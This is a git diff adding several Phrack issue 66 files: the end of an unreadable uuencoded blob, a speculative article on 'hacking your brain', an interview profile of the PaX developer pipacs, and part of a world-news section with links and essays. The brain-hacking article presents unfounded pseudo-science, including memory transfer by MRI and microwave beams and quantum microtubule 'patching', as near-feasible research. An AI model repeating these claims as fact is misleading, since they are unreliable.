+M)V:B0(*@S0-\7]K?'FI^3W-=+X]F"KJ5,^`0,'WG-#V`AG?T:KY71GC!7@:<
+M&RNIO!^,J`,`1'ETQ8P=W-L&K?@"HDO^04Y%U-];0Y%&D%)S#YI6^5TGK;6D
+M#&1\M8MQ[;ILPR9#^V*?<7;,?6+2PA9'7>@JV3=:7(9P1GU?DSDP2V91O#M]
+M80(U]03+;=XL0D*J,2:38T]&HT\6UV^DS&MTI&:;1$06_MXGW@1W7IE$ALA.
+M?G,T5UI2K)0M^EO*G4=G5-?7/D_M5K5JLK\IM4H$IEX7,FW+KLGFA-3E8XQ6
+M>0I#T"JAI)E?-_6\Y#[PJ4G:7W=O>MCW2E.5B!P*6SJ,QH:3-`OE!0(N8]U,
+M/0U?QU_,]-`A!7=QVXJHWTG)VEVG(:T6/R^NQN_,=#C0<I6)VHWGD>GDM@2/
+MKC#D]=\4>HA\AUU.O8(^E2[?+21@&C(2#3Z7SU_U]YT6F\("85#\,%\:NC5\
+M3GZW=?"^?;6,H:?WCSPU0M,N!EGRTSC+.-GTNY8>N_;<'&_*$04^C=YLW*0-
+MA_(!A,:#]'%$!7Q(]TU8_8Z+2Q\R8QWK.@6#4G8;S);M'K;^K%[D/F2'L?:,
+M28Y=7^'SGX5EQ9)RI?0XZ_79AIMK7#S4F!D0Q6(J]C%?7<W@U6(:$F0)W5PT
+MY28U*=A?-T16*.&OUC][.6<%KE)1NHM(G>H4IO\[J?-K.2%VFGDD(@I:Z_"1
+M&X'XTOH;KZ!J(P5X.X!<41P:`B&-R,&DH51>Z:<Y6_ZX^,MGQ`^(RRMGD!&;
+M/CSI-F@85RR\N&V53'[>#([3,,(Z63YAH++?.[!H57+H9LN0P.<W=O&8Y#E@
+M?0SQ:*]0=&T8A+EQ[2@_%RI0(@1@P>KW'-Z^)!WMO=MTU!LQ[&P]_LG;""B$
+M&B4@#/+;.^QR05@:B_?H]*%N>#&>07BB:K=,Y(V)0=#?UU:[88#J8>$G%G@<
+M^2>\>B^9MBHX5'*&I:AX<!P&2V+@'Q%^[CI<^>/&BV-$)3'QRW*>XNM(*>)R
+MS6XVSA':0YT[P1YGB<D[\9]S$+O@]JOD3Q,28D,0CH=1I\<.\/.B,U>T#%G'
+MZJ[NI.@WU9E''_@5Q[\2?L*3A]K3*_<:^)4CD[^8RZW,S9^]>#T:YBA%#1.]
+M-#K$-Z?XOP(7@&T\VTH8(M]<-B%T+3_P7K`-912]B<>>C(O[_IS^`^G+<PJY
+MJ8'X4?<_;J.X]BN#ARJW?A3GP,$$MO?:&I"XQ$TR_?HCZE\:FC8L5QRN1X55
+MD*Q^\/Y0DOHP!)/KY1"IR%B'9\#-UPZ+GV;:BSW@WW&2JZE^D:WUD*HC3ED1
+MG2]S&'1+[;]/=YXD*;33C[FC_3!*T3A]IR0C5A8\A#((B4#Q4Q>S]R5]-V!J
+M@$/FJ[A.O>2WF-2/5C5%/BBZ4:%KY9[;4?L%(LJ(5%:X;V^A@GT%%E-GH;0N
+M:ZWE0P%7F+XI&O_.)Q/:W133SJ3NXW3W3OTT0U9\O];DPC\B%$Q_#E,/.;.?
+MD'IH34QQ2A:A;X[#,-(@@R:(\H<;JDD&JAZ"1$+%@1'F7T@%Y7YE["?3"#2U
+M]%W'7K8P;K\A$B&[1Q),Q1$1S`L:,7>/:D$T6E=JQ5TJU;XJY6^D#,8PP2+)
+MP)`0G#5R2W,P3WYL'.":O#$G0E.^?Q00A_8W//E:D3TE,0EL"DP+#C8W=D31
+M@3!A*74:4IH%1EA3MB8XG$N6KZ.D)$VRC?$SNJ0-]SM2*6(*#ZZTYSII<UCR
+M,M3P]BOT5L=IL#!*U;`QNS8'63@/O.0@-39TJ3%&?*@*\_]5B,0$`_L%[`_Z
+B_ZN@_)___.<___G/?_[SG__\YS__^7_B?P"TW*T!`,@`````
+`
+end
+
+--------[ EOF
diff --git a/phrack66/17.txt b/phrack66/17.txt
new file mode 100644
index 0000000..81b4e02
--- /dev/null
+++ b/phrack66/17.txt
@@ -0,0 +1,208 @@
+                              ==Phrack Inc.==
+
+               Volume 0x0d, Issue 0x42, Phile #0x11 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=-----------=[ How close are they of hacking your brain? ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------=[     by dahut    ]=----------------------------=|
+|=----------------------=[  dahut@skynet.be]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+Since the invention of the EEG, S-F writers produced many books with
+stories about pumping out the content of your brain and putting it in
+another brain, or taking the control of your soul or willingness and
+driving you as a robot. We wil not talk about the well known MK-ULTRA
+project that never ended up on any real functioning device approaching
+this result. What they did reach is well described in the still suspicious
+book "Trance formation of America" (www.trance-formation.com).
+
+Our recent researched demonstrate however that it is possible that 
+something is happening or close to.
+
+We will explain two different technologies, that can provide some 
+breakthrough in the mind control.
+
+
+--[ 1. MRI
+
+By enhancing the resolution of Magnetic Resonance Imagery device, we
+should be able to do nice things such putting ideas or remembering in the
+brain of someone. 
+
+There are today multiples ways to measure brain activity. Brain activity 
+is also brain content, to some extent, depending what you are measuring 
+and what you are looking for.
+
+The most advanced works achieved around what's in the brain is the
+BlueBrain project, invented by Henry Markram at EPFL in Switzerland. His
+lab is using a 10.000 CPU Blue Gene type IBM supercomputer, and a super
+Silicon Graphic computer with 16 graphic cards and 64 Itanium 2 CPU to
+display processing results. He did start by making the inventory of all
+neurons types and response type, sorting out few tens types of each. Next
+he built devices to digitize the geometry of each type of neuron,
+following the path of dendrites and axons, branch by branch, stroke by
+stroke, change in diameter, etc. A typical neuron ends up with about
+10.000 XYZ 3D coordinates. Next, he packed 10.000 neurons of multiple
+types in a very narrow space; 5mm by 1mm. This is what scientists name a
+microcolumn of the neocortex. Then he put electrical input at the entry of
+the "network" and did a simulation, using the few tens of responses found
+in these neurons. The result is a modified electrical state of all these
+branches: 100 millions branches! Each one with a different electrical
+level. This density  of neurons produces short circuits between each of
+them, the synapse. Such micro column can contains up to a trillion
+synapses!
+
+From a mechanical point of view, this is not anymore a network, this is a 
+dense matter with different electrical level at each cubic 5 micron. You 
+should see the neuronal network as the processing device of the I/O, when 
+the remaining electrical levels are the memory of the 
+events/habits/experiences. 
+
+Now, let's say that a lab can produce a MRI device with such resolution.
+It will measure the electrical level each 5 micron, and do it for a
+specific area, let's say to start easy, the area of both hands. Ok, we
+have to store few terabytes of data, a quite easy job today.
+
+Now, let's take somebody, and put his head in another device, a three
+dimensional phased array radar, or more precisely, a micro wave transducer
+(only the emitting part of the radar). This device can browse space
+without movement. By putting two perpendicular transducers next to the
+brain, they can send two beams in it, and where they cross, create an
+electrical pulse with an intensity equal to the sum of both beams, also
+equal to the original.
+
+Doing so, it's possible with a super high resolution system, to pinpoint 
+each cell that was acquired (peeked) in the "donor", and poke its value 
+in the other brain.
+
+If the donor is a good violin player, the receiver, when waking up, will 
+feel as if he has new hands, and be surprised how easy he can play violin 
+(but maybe not Mozart yet).
+
+A step further, we can peek and poke other areas of the brain, like the 
+one containing experience, skills, visual scenes. With this last example, 
+a criminal or a suspect refusing to talk, can be peeked from the visual 
+cortex, and the result can be poked in another brain. The receiver will 
+"see" new scenes, and maybe the one of the crime.
+
+The better the resolution, the higher the resolution of the remembering.
+
+It's not mandatory to match neuron by neuron, from the donor to the
+receiver, or stroke by stroke, or synapse by synapse. The density is so
+high that we can really see the memory inside the neocortex as being
+stored in a three dimensional matrix. Whatever the network, as soon as it
+is the area used to do a specific operation (see Broca's areas)  like
+hands, speech, vision, etc. the "knowledge" stored during years is stored
+as electrical levels in a matrix. The neuronal network will find back it's
+way through the different channels of higher voltage poked in the matrix,
+reconnect instantaneously synapses to recreate missing bridges.
+
+
+--[ 2. Total Recall and Arnold Schwarzenegger are not so far!
+
+Here is a metaphor to better understand the concept:
+
+Think about a country: villages and inhabitants are there, connected with 
+road networks.
+
+Move houses and inhabitants in another place, keeping topology. Wherever
+they end up, they will immediately recreate roads and path to reconnects
+all houses and building. Houses and inhabitants are our memory and skills,
+materialized by electrical levels. They don't care about having to
+recreate roads and paths. They know where they want to go and which
+connections they need to do their work. The synaptic plasticity is even
+more wonderful than what you can imagine. Indeed, axons and dendrite can
+move as snakes to approach other neurons structure, and pop up synaptic
+connections everywhere they wan, and all of that in seconds!
+
+Basically, think about your brain being a computer. First neurons met by
+an external input are acting as your computer I/O unit; and A/D converter.
+These neurons are mostly in the internal side of the neocortex (inside the
+brain).The neurons the are receiving the converted measures are the
+processing units, and the neurons receiving the results, have to send it
+to the muscles or some other parts of your body. In parallel, all neurons
+are storing what's happening all the time, recording everything crossing
+them: this is our memory, a matrix parallel to our neuronal network, used
+for data storage an dnot directly related to our processing unit.
+
+The system described here above will not work to inject ideas in the
+brain, but just knowledge, remembering and skills. Producing ideas is
+something else, produced by consciousness, and this is a complete other
+story involving quantum physic.
+
+
+--[ 3. Quantum Physic
+
+We are now entering in leading edge researches made by visionary
+scientists that are not always belonging to what we name the "scientific
+paradigm", meaning that if they want to keep their annual funding, they
+should not investigate further these areas or stop to talk about what they
+are doing.  We will present you some of their work and how they can hack
+your brain to the perfection.
+
+If you take a neuron, or even any living cell, you can find in all of 
+them centriols and micro tubules. All are made of bi-state monomers 
+molecules, able to take two states, alpha and beta, depending the quantum 
+state of on of their component. Each molecule has a state but can switch 
+to the other one for some still unknown reason. When all the molecules of 
+one micro-tubule switch their state to the same one, the micro tubule 
+becomes super conductive for light and some other waves. The change of 
+state is due to one spinning particle that will collide the molecule and 
+change the position of one its atom. These molecules have a size of 15nm.
+We need therefore a device able to send spinning particle in a brain with 
+a resolution of  maximum 15 nm to have a chance to make the atom turning 
+the righ way. Hopefully, making an particle spinning left handed will 
+make the molecule swapping to it's L-associated state, or let's say the 
+alpha state. 
+
+There are already labs device able to adjust and measure particle's spin
+direction. Let's imagine we make them in such a way that they can work on
+the brain a little bit like the MRI hacking machine. It will not be a
+device as with the 3D phased array system,  but more a wave canon,
+adjusting the wave origin to match exactly the distance needed to act on a
+specific electron. The device will have to be highly accurate, and fast.
+We can think about minimum one million antennas in the device (don't
+worry, they are used with such complexity). The device will process
+millimeter by millimeter of the neo cortex, and required about one minute
+to read or patch a square centimeter. Because its entire surface is 2.000
+square cm, the device will need about two days to hack a complete brain.
+Being not able to have an exact matching between both brains geometry is
+not a matter, for the same reason as with the MRI system. We can use, only
+here, the term of holographic memory, because what's important is the
+spatial content, not the topological content. The brain network is so
+dense that it's not a network anymore when you speak about storing
+information in it. It's like house that are so dense that you can jump
+from one roof to the other, without going through the roads. So roads are
+used to process date coming from outside the village, and going outside
+the village, but if you stay in the village you don't need roads at all. 
+
+Now, let's explain what's the outcome of such blast in your brain.
+
+When you will wake up, after the long stay in the device, you will feel
+nothing new, because you are not yourself anymore, and you can't remember
+your first life. The guy standing in front of you, coming from the other
+machine, the "donor", si now YOU, but with another body. You feel now as
+twins, you have the same rembering of your life, you think the same, you
+have exactly the same knowledge and intelligence. If he s sad, you are
+sad, if he is good, you are good, if he likes men, you will like men too.
+
+If he is a terrorist, you will behave like a terrorist. Nothing to learn
+anymore, everything is already in your brain. You know how to build a
+bomb, how to pilot an air plane, how to fights, etc. but if was peanut to
+train you, to convince you, to enroll you. Well, there is the cost of the
+brain device, not cheap at all, but they have the cash!
+
+You can also decide to copy only part of the brain, but it's more risky
+because that's a research area were we are not far, and it could be
+dangerous to outcome with overlapping memory,  like, let's say, the top of
+you wife, and the bottom of your "loved boyfriend"!
+
+Next day, think twice when waking up: are you still yourself?
+
+References:
+http://bluebrain.epfl.ch/
+http://en.wikipedia.org/wiki/Phased_array
+http://en.wikipedia.org/wiki/Total_Recall
+
diff --git a/phrack66/2.txt b/phrack66/2.txt
new file mode 100644
index 0000000..c8b36c7
--- /dev/null
+++ b/phrack66/2.txt
@@ -0,0 +1,316 @@
+                             ==Phrack Inc.==
+
+                 Volume 0x0d, Issue 0x42, Phile #0x02 of 0x11
+
+|=----------------------------------------------------------------------=|
+|=------------------------=[ PHRACK PROPHILE ON ]=----------------------=|
+|=----------------------------------------------------------------------=|
+|=------------------------------=[ pipacs ]=----------------------------=|
+|=----------------------------------------------------------------------=|
+
+|=---=[ Specifications
+
+           Handle: pipacs
+              AKA: PaX Team
+    Handle origin: your pick between P. Howard and images.google.com :)
+      Produced in: .hu
+             Urlz: pax.grsecurity.net
+        Computers: always a generation behind...
+       Creator of: PaX
+        Member of: PaX Team :)
+         Projects: PaX
+	    Codez: ntid
+     Active since: 15+ years
+   Inactive since: past few years
+
+|=---=[ Favorites
+
+	  Actors: Chaplin
+	   Films: Versus
+	 Authors: Gurdjieff
+	   Books: Fire from within
+	   Novel: Jonathan Livingston Seagull
+	 Meeting: eclipse'99
+	   Music: Radioaktivitaet, The light of the spirit
+	 Alcohol: long island iced tea
+	    Cars: Maserati
+	   Foods: anything but 4 legs
+	  I like: good beer & wine
+       I dislike: all that bitter 'beer' down under :P
+
+
+|=---=[ Your current life in a paragraph
+
+	Working on some PHP/.net/js stuff for a SaaS startup, and generally
+	tired of everything security related. Fortunately there's life beyond
+	that :).
+
+|=---=[ First contact with computers
+
+	Despite the early 80's behind the iron curtain and COCOM restrictions,
+	I somehow managed to get my hands on an ABC-80 during a summer camp.
+	It was Z-80 and BASIC, but one had to start somewhere ;). Afterwards
+	came a ZX-81, a Spectrum, etc, the usual stuff in those days.
+
+|=---=[ Passions : What makes you tick
+
+	Unsolved problems. Unsolvable problems.
+
+|=---=[ Entrance in the underground
+
+	I'm not sure I was ever part of the underground but let's just say that
+	many of the smart people I met in the mid-90's would later end up in
+	computer security as a necessary outgrowth of skills they acquired in
+	reverse engineering. To me they're still the friends of 10+ years and
+	there's nothing	particular about being part of the underground (ok,
+	did i successfully ditch the question? :).
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+	It's of course PaX, especially some 6 years ago when spender and me
+	were porting it to new CPUs while solving unsolvable problems (where's
+	that NX bit on ppc32 again? :).
+
+|=---=[ How you got started on low-level concepts?
+
+	In the ZX Spectrum days I wanted to stop the clock in some game, so
+	there I was learning Z-80 assembly and finding that pesky dec (hl).
+	From then on it was lots of assembly coding for the Spectrum (still
+	proud of my own turbo loader after all these years :) then later the
+	Amiga (m68k) and finally the PC.
+
+	Interestingly, I really hated the PC (x86) after the m68k but when
+	I had to clean up after a virus infection (the first and only one I
+	ever got :), I finally gave in and learned x86 as well and began to
+	reverse engineer more stuff, particularly exe packers (ever since that
+	virus incident I still have the habit of unpacking and looking at
+	everything first). That then led to a never ending cat&mouse game
+	between debuggers and anti-debugging techniques, so I had to eventually
+	reverse	engineer and fix my choice of a debugger, SoftICE. That was a
+	major undertaking in hindsight but it taught me a lot about CPU details
+	that proved very useful in later years.
+
+|=---=[ Thoughts on future of security enhancements?
+
+	I think we'll see more of them as now there's very serious push in
+	the commercial sector (mostly due to Microsoft) to research and
+	develop practically useful techniques. There will be more tool chain
+	enhancements and also more kernel and hypervisor level work to lock
+	down various parts of the software stack and also to provide some
+	level of self-protection.
+
+	There will also be more work towards hardening parts of the client
+	side userland that is both powerful and most exposed to attacks.
+	Think web browsers, media players, etc, that all implement some form
+	of programmable engines which represent the same kind of problems as
+	runtime code generation (shellcode) did in the previous decades, just
+	at a higher abstraction level. Whether techniques developed so far
+	will be adaptable or not is an open question, but this problem needs
+	to be addressed soon.
+
+|=---=[ Short history of PaX?
+
+	At around the time when the Y2K panic was settling down I got into
+	a startup to develop a HIPS for windows. That didn't work out in
+	the end for several reasons, but the idea stuck into my head and
+	while enjoying the summer between two jobs, I somehow remembered
+	what I had read about a year ago on IA-32 TLB hacking and I was set
+	on the path. I talked to a few friends about it and we decided to
+	do a windows version as that's what we were familiar with (speaking
+	of kernel internals). This is also the reason for the 'team' in the
+	name, even if the other guys dropped out soon afterwards to pursue
+	other interests.
+
+	The summer passed and I got a new job where linux was everywhere and
+	one October weekend I sat down and figured I'd give it a try. Turned
+	out that the first cut wasn't that hard and I was surprised that the
+	new kernel booted without a hitch and worked as expected.
+
+	Then came public disclosure day, something I had debated for some time
+	but decided I wasn't going to go down the patent road. I still think
+	it was the right decision, even if many people thought and still think
+	I was a bit crazy to let this out for free :).
+
+	The following years saw slow but steady development of various ideas,
+	limited by my free time, (un)fortunately (depending on which side of
+	the fence you are :). For a more precise timeline just look at the
+	wikipedia article, I think my years spent in (sometimes voluntary)
+	unemployment will clearly stand out :).
+
+|=---=[ What future things are planned for PaX?
+
+	I wish I could just even list them :), but having looked at my to-do
+	list it seems I've got enough work left to fill more than a lifetime.
+
+	So without any particular preference, here's a few ideas that I hope
+	I can implement one of these days:
+
+	Ret2libc prevention: this is something I'd written about 6 years ago
+	but never got to implement it, and somewhat shamefully, the world at
+	large failed to as well (save for MSR's Gleipnir project perhaps).
+	I mean, all the effort people spent in the last decade on propolice/ssp
+	could have equally been spent on solving this much more relevant and
+	important problem...
+
+	Kernel self-protection: the goal here is to solve the somewhat
+	unsolvable problem of the kernel protecting itself from its own bugs.
+	What is or isn't possible is something you'll have to wait and see :).
+
+	More arch support: it would be nice if more CPU specific features could
+	be ported to other archs beyond x86, in particular ARM (android, mobile
+	phones) and MIPS (network gear) really need all the protection they can
+	get.
+
+	Virtualization support: whether it's a good idea or not from a security
+	point of view, virtualization is here to stay and unfortunately quite a
+	few of the existing kernel self-protection features are hard to handle
+	in those environments. I'm not yet sure what concessions can be made
+	here...
+
+|=---=[ Personal general opinion about the underground
+
+	I don't know much about it given how many years ago I lost most of my
+	interest in computer security, but I can't help but note that the
+	barrier of entry is set a lot higher than in the previous century.
+	Couple that with vested new interests (both commercial, governmental
+	and criminal, with unclear boundaries at times :P) in siphoning off
+	all the knowledge and people in security and I can see no bright
+	future for the kind of underground that there was before...
+
+	I just hope that the spirit of not taking anything at face value,
+	looking behind and beyond of what is already known will not die out in
+	the younger generations and some of them will keep their independence
+	for long enough to nurture underground outlets as this one :).
+
+|=---=[ Memorable Experiences
+
+	Meeting the internet in the early 90's when the whole country was
+	connected on a 9.6 kbps line to Vienna.
+
+	Downloading IDA 2.x in '94 and not knowing what to do with it at
+	first (anyone remembers ReSource on the Amiga? :).
+
+	Playing with SMM back in 1998, I keep wondering when Probe Mode gets
+	'discovered' and hyped up as well :).
+
+	Eclipse'99.
+
+	That ADMcon.
+
+	Being told by several native (english) speakers that I have a french
+	accent :P.
+
+	Seeing the AMD 'anti virus protection' ad on the London tube in the
+	summer of 2004 and realizing I may have had something to do with it.
+
+	2005, vomatron with a prince of Sri Lanka, you can blame PaX on him
+	too.
+
+	BAcon 06, the first and original one.
+
+	Padocon.
+
+	Teaching half the world to pronounce ege'szse'getekre (blame the lack
+	of proper accents on Phrack mandated ASCII :P).
+
+	Having to endure snoring from all kinds of people :).
+
+|=---=[ Memorable people you have met
+
+	People who worked on icedump.
+	The wonderful team of Q.
+	People who helped with PaX.
+	The Padocon folks who got a tad bit drunk on palinka.
+
+|=---=[ Memorable places you have been
+
+	All over the world except Antarctica.
+
+|=---=[ Things you are proud of
+
+	Reverse engineering SoftICE to the point that some NuMega folks
+	reportedly thought their src got stolen or something.
+
+	Learning amd64 and porting a pure asm kernel driver to XP 64 RC and
+	reverse engineering and circumventing PatchGuard (a year before
+	Uninformed had published anything on it) all in 4 weeks while also
+	handling an lkml flamewar and being jetlagged down under...
+
+|=---=[ Things you are not proud of
+
+	Some would say it's all the things I'm proud of :).
+
+	Oh, and sorry for having held up this release, but life's just too
+	busy...
+
+|=---=[ Opinion about security conferences
+
+	Too much hype over too little content. But then there're exceptions.
+
+	Fortunately most are organized enough that presentations are available
+	online with many academic confs being the exception, shame on them.
+	Nevertheless, it seems that I still managed to collect over 16 GB of
+	(security) conference material over the years so I guess the situation
+	is not that bad. I wish I had time to read all that though :).
+
+|=---=[ Opinion on Phrack Magazine 1985' ? 1995' ? 2005' ? '2009 ?
+
+	1985: I wish we had had a phone line to begin with :)
+	1995: the days when gopher was being taken over by http, and no
+	      encryption in sight... anyway, I think p47 was the first issue I
+	      got my hands on, and I didn't find it too interesting at the time,
+	      sorry :)
+	2005: that'd be p63 I guess (your version, that is :), a whole lot more
+	      stuff, and finally beyond the 100th how-to-backdoor-linux kind of
+	      article
+	2009: I have yet to see, it didn't leak so far (kudos for the new team :)
+
+|=---=[ What you would like to see published in Phrack ?
+
+	More hardware related hacking, there're way too many gizmos out there
+	these days to be ignored...
+
+	More specific uses of computers, such as aviation, space, astronomy,
+	particle physics, etc. There must be interesting things hiding there.
+
+	More food-for-thought kind of articles, it's somehow got neglected...
+
+|=---=[ Shoutouts to specific (group of) peoples
+
+	The old folks from UCF and other groups, all the Q people and those I
+	met through them, and basically everyone I drank a beer with :).
+ 
+|=---=[ Flames to specific (group of) peoples
+
+	It's all in the search engines already, for the better or worse :).
+
+|=---=[ Quotes
+
+	On some sunny day in July 2002 (t: Theo de Raadt):
+
+<cloder> why can't you just randomize the base
+<cloder> that's what PaX does
+<t> You've not been paying attention to what art's saying, or you don't 
+    understand yet, either case is one of think it through yourself.
+<cloder> whatever
+
+	Only to see poetic justice in August 2003 (ttt: Theo again):
+
+<miod> more exactly, we heard of pax when they started bitching
+<ttt> miod, that was very well spoken.
+
+	More recently, a student contemplating doing research related to
+	PaX/grsecurity:
+
+<xxx> So Dr. Spafford essentially told me that it's better to work on something
+      simpler than to try to do research that will save the world
+
+|=---=[ Anything more you want to say 
+
+	While most of the readers are undoubtedly living a computer dominated
+	life, let me remind everyone that you can't have beer over the
+	internet.  So go get out sometimes and maybe even invite the neighbour
+	over. For this is what builds real relationships, not electronic
+	substitutes.
+
+--------[ EOF
diff --git a/phrack66/3.txt b/phrack66/3.txt
new file mode 100644
index 0000000..2960a9e
--- /dev/null
+++ b/phrack66/3.txt
@@ -0,0 +1,447 @@
+                            ==Phrack Inc.==
+
+               Volume 0x0d, Issue 0x42, Phile #0x03 of 0x11
+
+|=--------------------------------------------------------------------=|
+|=-----------------------=[ Phrack World News]=-----------------------=|
+|=----------------------------=[ by TCLH ]=---------------------------=|
+|=--------------------------------------------------------------------=|
+
+
+The Circle of Lost Hackers is looking for any kind of news related to
+security, hacking, conference report, philosophy, psychology, surrealism,
+new technologies, space war, spying systems, information warfare, secret
+societies, ... anything interesting! It could be a simple news with just
+an URL, a short text or a long text. Feel free to send us your news.
+
+We didn't get any news from the Underground since our last phrack issue,
+it means that one more time all the news reports are coming from
+friends of our's.
+
+It would be good if people who claim themself "underground" would send
+us their news...
+
+Is our underground dead? (apparently yes...)
+
+
+1. Speedy Gonzales news
+2. Hacker hack thyself
+3. Evolt.org Marks a Decade
+
+--------------------------------------------
+
+
+--[ 1.
+
+ _____                     _
+/  ___|                   | |
+\ `--. _ __   ___  ___  __| |_   _
+ `--. \ '_ \ / _ \/ _ \/ _` | | | |
+/\__/ / |_) |  __/  __/ (_| | |_| |
+\____/| .__/ \___|\___|\__,_|\__, |
+      | |                     __/ |
+      |_|                    |___/
+ _____                      _
+|  __ \                    | |
+| |  \/ ___  _ __  ______ _| | ___  ___
+| | __ / _ \| '_ \|_  / _` | |/ _ \/ __|
+| |_\ \ (_) | | | |/ / (_| | |  __/\__ \
+ \____/\___/|_| |_/___\__,_|_|\___||___/
+ _   _
+| \ | |
+|  \| | _____      _____
+| . ` |/ _ \ \ /\ / / __|
+| |\  |  __/\ V  V /\__ \
+\_| \_/\___| \_/\_/ |___/
+
+
+*-[ Phrack 64 0x11 is about the french scene and not a sellout conference... ]- 
+
+http://www.frhack.org/history.html
+
+
+*-[ Promise, we are safe... ]-
+
+http://www.opednews.com/articles/1/US-Spying--Main-Core-PRO-by-Ed-Encho-090202-224.html
+
+
+*-[ Is the Pentagone secure? ]-
+
+http://online.wsj.com/article/SB124027491029837401.html
+
+
+*-[ Finally, someone is reasonable...]-
+
+http://www.securityfocus.com/blogs/1908
+
+
+*-[ Because we love it ]-
+
+http://cryptome.org/
+
+
+*-[ Silvio is back in the business ]-
+
+http://silviocesare.wordpress.com/ 
+http://silvio.cesare.googlepages.com/
+
+
+*-[ Because it is funny ]-
+
+http://www.encyclopediadramatica.com/index.php/The_Unix_Terrorist
+http://www.encyclopediadramatica.com/GOBBLES
+http://www.encyclopediadramatica.com/N3td3v
+
+
+*-[ They should know everyone is working for Phrack ]-
+
+http://archives.neohapsis.com/archives/fulldisclosure/2009-01/0324.html
+
+
+*-[ Ten years late... ]-
+
+http://www.dtors.org/papers/malicious-code-injection-via-dev-mem.pdf
+
+
+*-[ Fedwire Funds Transfer System ]-
+
+http://www.federalreserve.gov/paymentsystems/coreprinciples/coreprinciples.pdf 
+www.ists.dartmouth.edu/library/216.pdf
+http://www.fedwiredirectory.frb.org/search.cfm
+
+
+--[ 2. "Hacker Hack Thyself" ]--
+	by Kartikeya Putra <alienbaby@freaknetwork.in>
+
+
+"All human beings, all persons who reach adulthood in the world today are
+programmed biocomputers. None of us can escape our own nature as
+programmable entities. Literally, each of us may be our programs, nothing
+more, nothing less."
+
+-- John C. Lilly, Programming and Metaprogramming in the Human Biocomputer
+
+
+In the early 1970's, during the early days of Artificial Intelligence
+research, scientists from the fields of psychology and computer science came
+together to try to develop a new model of how the mind works. Their efforts
+eventually resulted in the discipline now known as Cognitive Science. One of
+the more significant books to come out of this early collaborative effort
+was called Scripts, Plans, Goals and Understanding by Roger Schank and
+Robert Abelson, which is still used by psychologists today to support what's
+called the Information Processing Model of human cognition. I'd suggest that
+anyone with a serious interest in reverse engineering themselves should hunt
+down a used copy of this out-of-print book (try bookfinder.com, or your
+local library). In it, the authors suggest that human thought is based on a
+set of scripts (programs) for meeting personal goals in different
+situations. The example they use throughout the book is a "Restaurant
+Script" that tells people how to behave when eating out in public, in order
+to meet the goal of getting fed. What would you do if you ordered a
+hamburger and the waitress brought you a hot dog? Your scripts tell you how
+to handle this situation, what to do when the bill comes, and how to handle
+all the other transactions that take place in the restaurant environment.
+
+Scripts People Live by Claude Steiner is a book about a form of
+pop-psychology called Transactional Analysis. Here the author talks about
+how everyone has a sort of running "life script" which is basically the
+story of your own life as you like to tell it. Inside this script there are
+recurring roles that are often learned in childhood, which inform us how
+people are supposed to behave. I doubt that anyone ever reaches adulthood
+with a completely accurate script of their own life story -- but if you can
+become conscious of your script, it's possible to start improving it and
+improving the way you write it as you go along.
+
+Some of our most basic programming concerns what it means to be "good" or
+"bad." When parents, teachers and other authorities are training us how to
+be "good," often this has very little to do with doing what is right and is
+more about training us to behave in ways that are convenient for them. Today
+the task of programming "reality" has substantially been taken over by
+television, which is like a mindcontrol device that sits in the living room,
+hypnotizing a legion of glassy-eyed zombies. It is sponsored by corporations
+who are not concerned with anything except selling their products. In one of
+my favorite commercials on TV right now, this blonde dude -- who looks to me
+like he knows he is about to become a complete tool -- holds up a McDonald's
+chicken sandwich and proclaims, "Let's hear it for nonconformity!" Are you
+kidding me? It's so phony it's almost avant garde. Andy Warhol would love it
+-- I find it disturbing. I know that there must be a lot of people out there
+who don't see anything wrong with this ad -- and others who even buy into it,
+who think that eating a chicken sandwich for breakfast really is
+"revolutionary."
+
+When we were teenagers, some of us correctly perceived the system as a
+hypocritical crock of shit and said, "screw this, I'm out of here." As an
+adult with a little perspective now I can see that there's nothing wrong
+with wanting to do your own thing, but rebellion against the system is still
+a part of it. Maybe we found a peer group who claimed to represent "the
+resistence," the anti-system -- but it's a trick, the anti-system is still
+part of the system. By joining it you think you are becoming free, but it's
+just a trick. As an "outsider," if you break laws or do things that hurt
+yourself or others, you're just playing in to the role the system wants you
+to play -- you're doing exactly what you are supposed to do as an "outsider."
+The anti-system system is there because they need "bad guys," so that they
+can play the "good guys" in comparison. If you are good and not one of them,
+the whole system collapses. That is revolutionary!
+
+The foundation on which this whole sado-masochistic world system is erected
+is the perception of yourself as a victim. A lot of people are starting to
+figure this out, and when that number reaches a certain tipping point it is
+going to alter the structure of the matrix. Seeing yourself as the world's
+victim is profoundly disempowering and keeps you locked in a cycle of
+self-created pain and misery. We break free from this cycle by making a
+conscious decision to accept complete responsibility for our own reality.
+Get a copy of The Anger Habit Workbook by Carl Semmelroth and study it like
+a bible. Drs. Barry and Janae Weinhold have an excellent series of six
+e-books titled Breaking Free From the Matrix. There are a lot of wonderful
+books out there to help us take control of our minds and emotions and break
+free from the matrix of social power -- find them, and free your mind.
+
+-[ 3. Evolt.org Marks a Decade ]-
+             by mstrix
+
+:: 1998      ::  ORIGINS
+:: 1998-2000 ::  RAPID GROWTH
+:: 2000-2002 ::  GROWING FLAMES
+:: 2003-2005 ::  SEEKING BALANCE
+:: 2006-2008 ::  FACING INERTIA
+:: 2008 AND  ::  OUR FUTURE
+
+
+	The internet is the most reliable machine ever made.
+	It's made from imperfect, unreliable parts, connected
+	together, to make the most reliable thing we have."
+    		- Kevin Kelly, Wired founder
+
+Evolt.org is a world community for web developers and other internet 
+professionals. We host discussion lists, publish articles on our 
+website, and maintain a browser archive offering downloads of everything 
+from Mosaic to Flock. From the beginning, our community has been 
+international, anarchistic, and volunteer-run. If there is one thing 
+that makes us stand out from other web development organizations, it has 
+been our long-term focus on cultivating community. Yet as much as we 
+have worked together, evolt.org's history is marked by heated turf 
+battles interspersed with periods of inertia. We have struggled for 
+years to find a balance between process, production, leadership and 
+decentralization, while steadfastly maintaining our ideals and 
+integrity. On December 14, 2008, evolt.org turns ten years old.
+
+This is the story of our first decade, from the perspective of someone 
+who has been a part of evolt.org since the early days.
+
++-+-+-+-+-+-+-
+1998 : ORIGINS
++-+-+-+-+-+-+-
+
+Evolt.org began as a 1998 copyright dispute between Wired Digital's 
+Webmonkey and some members of Webmonkey's web dev discussion list, 
+monkeyjunkies. The high-volume list had been operating since 1997. 
+Active monkeyjunkies members wanted an online list archive, so they 
+could search for and reference past posts, but Wired (who had recently 
